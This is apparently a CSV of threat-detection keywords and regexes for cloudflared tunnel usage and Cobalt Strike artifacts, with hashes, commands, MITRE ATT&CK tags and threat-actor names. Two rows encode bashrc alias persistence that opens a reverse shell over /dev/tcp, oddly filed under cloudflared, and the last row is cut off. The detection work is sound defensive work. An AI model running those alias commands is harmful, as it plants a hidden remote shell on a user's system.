"*07b95428cfb9cb49c2447c2ff9fbc503225d5de7ff70c643f45399fc2f08c48c*",".{0,1000}07b95428cfb9cb49c2447c2ff9fbc503225d5de7ff70c643f45399fc2f08c48c.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*0b917a040f43b5b120a3288f76e857203cc52f51c2f78c997d4d0c2da3d0c0c5*",".{0,1000}0b917a040f43b5b120a3288f76e857203cc52f51c2f78c997d4d0c2da3d0c0c5.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*0ec73349570f7d8546b9ddfd6b0b409cd622abc133be641bb2a414a2d2b9a21e*",".{0,1000}0ec73349570f7d8546b9ddfd6b0b409cd622abc133be641bb2a414a2d2b9a21e.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*17fa4fd9db3006f9aa649b0160770ebb9e9b8a599f6fb5afce83a16a7cb41bdd*",".{0,1000}17fa4fd9db3006f9aa649b0160770ebb9e9b8a599f6fb5afce83a16a7cb41bdd.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*1b3e09c31048ec7f2ef06166eb47dcdf0e563ca07b6dcc1318fa6f7db3feb458*",".{0,1000}1b3e09c31048ec7f2ef06166eb47dcdf0e563ca07b6dcc1318fa6f7db3feb458.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*2fb6c04c4f95fb8d158af94c137f90ac820716deaf88d8ebec956254e046cb29*",".{0,1000}2fb6c04c4f95fb8d158af94c137f90ac820716deaf88d8ebec956254e046cb29.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*33c9fa0bbaca1c4af7cf7c6016cda366612f497d08edd017bced7c617baa7fc2*",".{0,1000}33c9fa0bbaca1c4af7cf7c6016cda366612f497d08edd017bced7c617baa7fc2.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*33e6876bd55c2db13a931cf812feb9cb17c071ab45d3b50c588642b022693cdc*",".{0,1000}33e6876bd55c2db13a931cf812feb9cb17c071ab45d3b50c588642b022693cdc.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*55c11ee0078d85ed35d7df237458e40b6ad687f46fc78b1886f30c197e1683c1*",".{0,1000}55c11ee0078d85ed35d7df237458e40b6ad687f46fc78b1886f30c197e1683c1.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*561304bd23f13aa9185257fb0f055e8790dc64e8cf95287e2bfc9fec160eecf8*",".{0,1000}561304bd23f13aa9185257fb0f055e8790dc64e8cf95287e2bfc9fec160eecf8.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*569b8925a41bd1426fc9f88a4d00aa93da747ed4a5ec1c638678ac62ae1a7114*",".{0,1000}569b8925a41bd1426fc9f88a4d00aa93da747ed4a5ec1c638678ac62ae1a7114.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*5868fed5581f3fb186c94b6be63f8b056c571159edb65cc5dafb84553e888d39*",".{0,1000}5868fed5581f3fb186c94b6be63f8b056c571159edb65cc5dafb84553e888d39.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*62700c23ce8560628d8eb07ab2adcf863ad901c9f631bb45ed4b4f801f35b2a5*",".{0,1000}62700c23ce8560628d8eb07ab2adcf863ad901c9f631bb45ed4b4f801f35b2a5.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*6ee5eab9a9aa836ac397746a20afbb671971c6553bf8d6a844ba0a7a8de8447e*",".{0,1000}6ee5eab9a9aa836ac397746a20afbb671971c6553bf8d6a844ba0a7a8de8447e.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*9a6f666b2d691d7c6aadd7b854b26cffd76735e9622f3613577b556fe29eb6a1*",".{0,1000}9a6f666b2d691d7c6aadd7b854b26cffd76735e9622f3613577b556fe29eb6a1.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*b3d21940a10fdef5e415ad70331ce257c24fe3bcf7722262302e0421791f87e8*",".{0,1000}b3d21940a10fdef5e415ad70331ce257c24fe3bcf7722262302e0421791f87e8.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*b7e394578b41e9a71857e59d04b7bf582e3d0d15f314ab69f269be474a4b9e1a*",".{0,1000}b7e394578b41e9a71857e59d04b7bf582e3d0d15f314ab69f269be474a4b9e1a.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*ca6ac5c1c1f30675eecf91fe295d703007a754c1b320609ede7aa4783d899e9e*",".{0,1000}ca6ac5c1c1f30675eecf91fe295d703007a754c1b320609ede7aa4783d899e9e.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*--chown=nonroot /go/src/github.com/cloudflare/cloudflared/cloudflared /usr/local/bin/*",".{0,1000}\-\-chown\=nonroot\s\/go\/src\/github\.com\/cloudflare\/cloudflared\/cloudflared\s\/usr\/local\/bin\/.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*cloudflared tunnel --config *",".{0,1000}cloudflared\stunnel\s\-\-config\s.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*cloudflared tunnel create *",".{0,1000}cloudflared\stunnel\screate\s.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*cloudflared tunnel info *",".{0,1000}cloudflared\stunnel\sinfo\s.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*cloudflared tunnel list*",".{0,1000}cloudflared\stunnel\slist.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*cloudflared tunnel login*",".{0,1000}cloudflared\stunnel\slogin.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*cloudflared tunnel route dns *",".{0,1000}cloudflared\stunnel\sroute\sdns\s.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*cloudflared tunnel route ip add *",".{0,1000}cloudflared\stunnel\sroute\sip\sadd\s.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*cloudflared tunnel route ip show*",".{0,1000}cloudflared\stunnel\sroute\sip\sshow.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*cloudflared tunnel run *",".{0,1000}cloudflared\stunnel\srun\s.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*cloudflared-amd64.pkg*",".{0,1000}cloudflared\-amd64\.pkg.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","1","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*cloudflared-windows-386.exe*",".{0,1000}cloudflared\-windows\-386\.exe.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","1","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*cloudflared-windows-amd64.exe*",".{0,1000}cloudflared\-windows\-amd64\.exe.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","1","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*cloudflared-windows-amd64.msi*",".{0,1000}cloudflared\-windows\-amd64\.msi.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","1","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*d6c358a2b66fae4f2c9fa4ffa8cd37f6ab9b7d27c83414f70c1d6a210812f0fa*",".{0,1000}d6c358a2b66fae4f2c9fa4ffa8cd37f6ab9b7d27c83414f70c1d6a210812f0fa.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*d79111ec8fa3659c887dd4e82f8ce6ff39391de6860ca0c2045469d6ab76a44f*",".{0,1000}d79111ec8fa3659c887dd4e82f8ce6ff39391de6860ca0c2045469d6ab76a44f.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*dc76f7c6b506d3ec4a92d9a0cda9678c3cb58a9096587dde15897709c7b23a33*",".{0,1000}dc76f7c6b506d3ec4a92d9a0cda9678c3cb58a9096587dde15897709c7b23a33.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*e8118e74c74a62a1d8dc291cb626f46d0056b1284726c2a5d671e20a5e92270c*",".{0,1000}e8118e74c74a62a1d8dc291cb626f46d0056b1284726c2a5d671e20a5e92270c.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*echo 'alias cat=/bin/bash -c 'bash -i >& /dev/tcp/*/* 0>&1'' >> */.bashrc* ",".{0,1000}echo\s\'alias\scat\=\/bin\/bash\s\-c\s\'bash\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\>\&1\'\'\s\>\>\s.{0,1000}\/\.bashrc.{0,1000}\s","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*echo 'alias find=/bin/bash -c 'bash -i >& /dev/tcp/*/*>> ""$user/.bashrc""*",".{0,1000}echo\s\'alias\sfind\=\/bin\/bash\s\-c\s\'bash\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\>\>\s\""\$user\/\.bashrc\"".{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*ed4f5607dbc3fec5d43fbc22fb12a79d8bca07aa60c8733db7f495b7210d631f*",".{0,1000}ed4f5607dbc3fec5d43fbc22fb12a79d8bca07aa60c8733db7f495b7210d631f.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*fffec1382a3f65ecb8f1ebb2c74e3d7aa57485fb4cff4014aadc10b8e9f3abc8*",".{0,1000}fffec1382a3f65ecb8f1ebb2c74e3d7aa57485fb4cff4014aadc10b8e9f3abc8.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","#filehash","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*protocol-v2.argotunnel.com*",".{0,1000}protocol\-v2\.argotunnel\.com.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","1","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*sc create Cloudflared binPath=\*",".{0,1000}sc\screate\sCloudflared\sbinPath\=\\.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*sc.exe create Cloudflared binPath=\*",".{0,1000}sc\.exe\screate\sCloudflared\sbinPath\=\\.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*sudo systemctl edit --full cloudflared.service*",".{0,1000}sudo\ssystemctl\sedit\s\-\-full\scloudflared\.service.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","0","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*test-cloudflare-tunnel-cert-json.pem*",".{0,1000}test\-cloudflare\-tunnel\-cert\-json\.pem.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","1","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*update.argotunnel.com*",".{0,1000}update\.argotunnel\.com.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider*","C2","https://github.com/cloudflare/cloudflared","1","1","N/A","N/A","10","10","8745","773","2024-08-26T21:41:20Z","2017-10-13T19:54:47Z"
"*\AppData\Local\Microsoft\CLR_*\UsageLogs\*.exe.log*",".{0,1000}\\AppData\\Local\\Microsoft\\CLR_.{0,1000}\\UsageLogs\\.{0,1000}\.exe\.log.{0,1000}","greyware_tool_keyword","cobaltstrike","If cobaltstrike uses execute-assembly there is a chance that a file will be created in the UsageLogs logs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - APT29 MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass","C2","https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*cmd.exe /c echo * > \\.\pipe\*",".{0,1000}cmd\.exe\s\/c\secho\s.{0,1000}\s\>\s\\\\\.\\pipe\\.{0,1000}","greyware_tool_keyword","cobaltstrike","potential malleable Cobalt Strike profiles behavior","T1559 - T1134.001 - T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - APT29 MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - 